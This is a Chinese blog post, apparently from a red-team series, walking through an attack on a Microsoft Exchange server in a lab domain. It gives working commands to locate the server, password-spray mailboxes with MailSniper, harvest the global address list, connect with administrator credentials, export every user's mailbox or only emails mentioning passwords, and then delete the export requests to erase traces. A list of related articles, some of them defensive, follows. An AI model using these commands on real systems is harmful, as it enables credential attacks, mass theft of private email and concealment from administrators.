exchange实战

于 2023-08-29 01:29:05 发布
阅读量216 收藏
点赞数
分类专栏: red 内网 文章标签: 网络安全 java windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/132551105
版权
内网 同时被 2 个专栏收录
13 篇文章 1 订阅
订阅专栏
red
11 篇文章 0 订阅
订阅专栏

未得到exchange服务器权限

确定exchange服务器ip地址

setspn -T example.domain.com -F -Q */* | findstr exchange

在这里插入图片描述

MailSniper

爆破用户名和密码
爆破Exchange邮箱用户名密码,为了防止账号被锁定,所以我们使用密码喷洒攻击,即只使用一个密码来碰撞用户名

Invoke-PasswordSprayEWS -ExchHostname WIN-R6M7IQRLCGA.hdh.com -UserList user.txt -Password xxxxxx -Threads 10

在这里插入图片描述
在这里插入图片描述
成功爆破出密码,但是我结果写入文件失败了,这些报错不知道怎么回事,不过可以正常爆破密码
而且用户名格式不一样也能爆破出来,就是结果导出有问题
在这里插入图片描述
获取邮箱通讯录
在获取一个邮箱账号密码后,可以使用MailSniper收集通讯录,当拿到通讯录后,可以再次利用上述爆破手段继续尝试弱密码,但是记住,密码次数不要太多,很有可能会造成域用户锁定
Get-GlobalAddressList -ExchHostname WIN-R6M7IQRLCGA.hdh.com -UserName hdh\wahaha -Password xxxxxx -OutFile address-list.txt
在这里插入图片描述
这样用户就枚举出来了

得到exchange服务器权限后

使用PSSession连接Exchange服务器

$User = "hdh\administrator"
$Pass = ConvertTo-SecureString -AsPlainText xxxxxxx -Force
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://WIN-R6M7IQRLCGA.hdh.com/PowerShell/ -Authentication Kerberos -Credential $Credential
Import-PSSession $Session -AllowClobber

在这里插入图片描述
查看PSSession

Get-PSSession

删除PSSession

Remove-PSSession $Session

测试命令(获得所有邮箱用户):

#获得所有用户
Get-Mailbox

以下是在exchange服务器上进行操作的没有使用远程PSSession去执行,实战中需要PSSession去执行

导出数据及其清除

页面导出在这里插入图片描述
exchange shell导出
1.将用户添加到角色组”Mailbox Import Export”
在这里插入图片描述
2.重新启动exchange shell
否则不能使用New-MailboxexportRequest
3.导出邮件并保存
(1)导出指定用户的所有邮件,保存到Exchange服务器的c:\test

$User = "administrator"
New-MailboxexportRequest -mailbox $User -FilePath ("\\localhost\c$\test\"+$User+".pst")

在这里插入图片描述
(2)筛选出指定用户的wahaha中包含单词pass的邮件,保存到Exchange服务器的c:\test

$User = "wahaha"
New-MailboxexportRequest -mailbox $User -ContentFilter {(body -like "*pass*")} -FilePath ("\\localhost\c$\test\"+$User+".pst")

在这里插入图片描述
(3)导出所有邮件,保存到Exchange服务器的c:\test

Get-Mailbox -OrganizationalUnit Users -Resultsize unlimited |%{New-MailboxexportRequest -mailbox $_.name -FilePath ("\\localhost\c$\test\"+($_.name)+".pst")}

在这里插入图片描述
可以看到wahaha时间不是最新,因为wahaha不在Users组中,在安全组中

查看邮件导出请求

#粗略查看
Get-MailboxExportRequest

在这里插入图片描述

#精准查看
Get-MailboxExportRequest|fl

在这里插入图片描述
删除具体的某个导出请求:(以上图第一个wahaha为例)
注意:这两个命令依次输入才可以成功删除,截图未全

Remove-MailboxExportRequest -RequestQueue "Mailbox Database 1864638920" -RequestGuid 7c9ca813-22b5-43e7-84f5-0fe69682bea3 -Confirm:$false

Remove-MailboxExportRequest -Identity 'hdh.com/Microsoft Exchange Security Groups/wahaha\MailboxExport' -Confirm:$false

在这里插入图片描述
可以看到wahaha的Mailbox Database 1864638920删除请求已经删掉
删除所有导出请求

Get-MailboxExportRequest|Remove-MailboxExportRequest -Confirm:$false

在这里插入图片描述
可以看到全部删除成功

查看指定人指定日期内邮件

#查看发件人administrator@hdh.com2019119:00至今发送的所有邮件的相关信息(包括发件人,收件人和邮件主题)Get-MessageTrackingLog -Start "01/11/2019 09:00:00" -Sender "administrator@hdh.com"

在这里插入图片描述
参考:https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E4%BB%8EExchange%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E6%90%9C%E7%B4%A2%E5%92%8C%E5%AF%BC%E5%87%BA%E9%82%AE%E4%BB%B6

番茄酱料
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Exchange Server 2010 SP1实战精粹
02-27
Exchange Server 2010 SP1实战精粹》是一本深入探讨Microsoft Exchange Server 2010 Service Pack 1 (SP1) 技术的专著,旨在为IT专业人士提供全面、实用的指南。Exchange Server是Microsoft公司推出的企业级邮件...
【内网安全】横向移动&Exchange服务&有账户CVE漏洞&无账户口令爆破
今天是几号的博客
03-30 874
Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。简单而言,Exchange server可以被用来构架应用于企业、学校的邮件系统。Exchange是收费邮箱,但是国内微软并不直接出售Exchange邮箱,而是将Exchange、Lync、Sharepoint三款产品包装成Office365出售。实验靶场环境:0day.org单域环境Win7 x64 0day.org PC-Jack 访问域主机地址。
使用远程 PowerShell 连接到 Exchange 服务器
taoxul2006的博客
08-12 866
若要使用此版本的 Windows,您需要安装 Microsoft .NET Framework 4.5 或更高版本,然后安装 Windows 管理框架的更新版本:3.0、4.0 或 5.1(仅一个)。这是一个简单的三步过程,您输入凭据,提供所需的连接设置,然后将 Exchange cmdlet 导入到本地 Windows PowerShell 会话中,以便您可以使用它们。在打开的“Windows PowerShell 凭据请求”对话框中,输入用户主体名称 (UPN)(例如)和密码,然后单击“确定”。...
文件服务器账户不停的锁,活动目录账户不断锁定
weixin_34961316的博客
08-06 463
AD用户 帐户不断锁定。我的AD里的其中一个用户,今天突然被锁定了,我在AD里去掉用户已锁定, 但是一刷新后, 帐户立刻又被锁定了, 在我的EXCHANGE服务器的安全日志上会不断重复680和539的报错.我已经进行了以下操作:1.把用户帐户放到一个新的OU里,并且不继承组策略(图4) ,但是问题依旧2.把用户的登录名修改后,问题就可以解决, 但是我不想修改用户的登录名.3.上个星期出现过同样的问...
多方面保护邮件安全
weixin_33700350的博客
06-19 217
邮件在传输过程中,避免不了在传输过程中,被人截获、修改,对公司造成巨大的经济损失。所以就需要使用邮件加密和数字签名技术。 邮件加密提供了针对邮件信息泄露的解决方案,邮件加密的特点就是数据在传输过程中可以进行机密性的加密。邮件加密过程:邮件解密过程: 数字签名可以保证的是邮件在传输过程中,不会让第三方用户看到邮件中真正的内容,而签名的目的就是为了让收件人知道这封邮件的确是发件人发送的,而不是第三方用...
exchange-Server-2010-从入门到精通(Exchange-Server-2010-配置实战精粹).zip
最新发布
06-04
这个压缩包文件“exchange-Server-2010-从入门到精通(Exchange-Server-2010-配置实战精粹).zip”包含了关于Exchange Server 2010的全面学习资料,特别关注配置和实战应用。 Exchange Server 2010的核心功能包括邮件...
Exchange Server 2010配置实战
11-13
非常详细的资源,大家可以好好学习下,积分也不是我最主要的目的
Exchange Server 2010 配置实战精粹
06-14
Exchange Server 2010 配置实战精粹(Exchange Server 2010 由入门到精通).pdf
Exchange 常见问题(转自微软论坛)
挨踢人生
12-07 4824
来自望兄的总结。这些文档都是最基础的了。如果你有类似的不清楚的问题,这里都是比较权威的回答了。1.什么是邮件中继? 邮件中继是指将邮件转发到你所在域以外的域的能力。更具体地说,当使用与您的 SMTP 服务器的入站连接来向外部域发送电子邮件时,便发生了中继。 2.在Exchange 2003中,如何知道哪些SMTP域是你的权威域?打开Exchange Se
Exchange 2007-2010如何防止外部连接冒用本域地址向内发邮件?
weixin_33966095的博客
07-26 213
在缺省情况下Anonymous user权限组有下面的权限:Ms-Exch-SMTP-SubmitMs-Exch-SMTP-Accept-Any-SenderMs-Exch-SMTP-Accept-Authoritative-Domain-SenderThis permission allows senders that have e-mail addresses in au...
Exchange邮箱爆破和信息收集
谢公子的博客
08-10 7536
在渗透测试过程中,经常会碰到使用Exchange邮箱的系统。但是Exchangeweb端是无法爆破的,可以爆破客户端。 Invoke-PasswordSprayEWS MailSniper
Exchange的渗透流程(一)
Sunnet的博客
05-07 1835
Exchange的渗透流程(一)
渗透基础——从Exchange服务器上搜索和导出邮件
systemino的博客
10-08 3086
0x00 前言 在渗透测试中,如果我们获得了Exchange服务器的管理权限,下一步就需要对Exchange服务器的邮件进行搜索和导出,本文将要介绍常用的两种方法,开源4个powershell脚本,分享脚本编写细节。 0x01 简介 本文将要介绍以下内容: ·管理Exchange服务器上邮件的两种方法 ·导出邮件的两种方法 ·搜索邮件的两种方法 注:本文介绍的方法均为power...
mailsniper.ps1使用
网络安全。
02-29 3112
下载地址:mailsniper 0x01 mailsniper.ps1获取outlook所有联系人(为爆破收集邮箱) 在域环境内(域内机器即可)执行命令: powershell -exec bypass Import-Module .\MailSniper.ps1 Get-GlobalAddressList -ExchHostname owa2013.rootkit.org -UserName ...
Exchange 暴力破解与防范
08-25 1923
针对Exchange漏洞的利用有很多种方式,但大多数攻击手法首先要有一个邮箱账号,所以,最重要的一步就是获取邮箱账号。获取邮箱账号最常见的攻击方式有两种,钓鱼邮件以及暴力破解。本文整理了Exchange暴力破解的方式,以及记录和分享一些防范方面的小技巧。01、Exchange暴力破解(1)OWA登录爆破Exchange邮箱登录界面,默认没有验证码,也没有登录爆破限制,可通过BurpSuite尝试遍...
Exchange可以拿来爆破的接口
rv0p111
10-09 2449
Exchange可以拿来爆破的接口 1、EWS 服务 URL,exchange web 服务配置 https://192.168.88.129/ews/exchange.asmx 2、还可以是owa接口–提供WEB方式邮件访问功能 https://192.168.88.129/owa 3、可以是AUTODISCOVER自动发现服务 根据您是否在单独的站点上配置了自动发现服务,自动发现...
Exchange的安全问题(一)
weixin_33933118的博客
01-29 669
好久没写博客了,这2周都在搞Exchange安全相关的东西,终于搞完了,算告一段落吧,打算拿出来和大家分享一下。很多公司Exchange部署 完成后都是通过TMG,或者直接把CAS发布到公网上,让用户在家或者非公司办公网络 登录邮箱进行邮件收发的。类似这种的文章大把大把,我就不多说了但是这种场景会存在安全风险无法防止暴力破解虽然AD账号有锁定机制,但是当有人暴力破解Excha...
虚拟机简单搭建域环境
bring_coco的博客
06-09 9309
可以看到是防火墙的问题,那么我们可以更改其策略或者关闭防火墙,当然由于其是域用户所以都得需要域管权限才行,因此更改时候需要输入域管账号密码进行认证。重启之后可以看到AD和DNS服务都有了,同时该域控的信息也会放到DNS服务器中,以便于域内其他用户能够通过DNS服务访问到域控,如下图。成功加入域内,然后重启,用域用户testuser的账号密码进行登录(当然也可以用域管账号密码登录)只不过是权限不同。依然是先更改其ip地址,当然要和域控的ip在一个段内,注意的是DNS的ip要是域控的地址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值